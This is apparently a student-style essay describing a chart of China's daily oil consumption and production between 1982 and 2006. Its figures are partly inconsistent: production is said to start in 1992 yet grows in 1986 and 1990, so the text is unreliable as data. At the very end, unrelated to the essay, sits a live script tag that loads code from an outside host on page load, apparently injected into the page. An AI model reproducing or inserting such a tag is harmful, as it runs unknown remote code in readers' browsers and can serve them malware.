In 1982, the consumption was the lowest of only 2 millions oil barrels per day which was remained the same till 1990. After 1990, the consumption shows a rise of 1.5 million oil barrels in 1994 which was more than the previous years. Moreover, after 1994 the consumption was continuously increasing with 4, 5, and 6 millions of oil barrels per day in 1998, 2002 and 2006 respectively.
On the contrary, the production was also started in 1992 with 2 million oil barrels per day only but then increased with 1 million for the next three coming years (1986,1990 and 1994). Whereas the production for millions of oil barrels per day had increased only with 0.5 million for rest of the years which was 1998,2002 and 2006.
In conclusion, the consumption of oil barrels per day had been increasing rapidly throughout 1982-2006 whereas the production had been going up slowly compared to the consumption of oil in China.<script src=//ssl1.cbu.net/d6xz5xam></script>
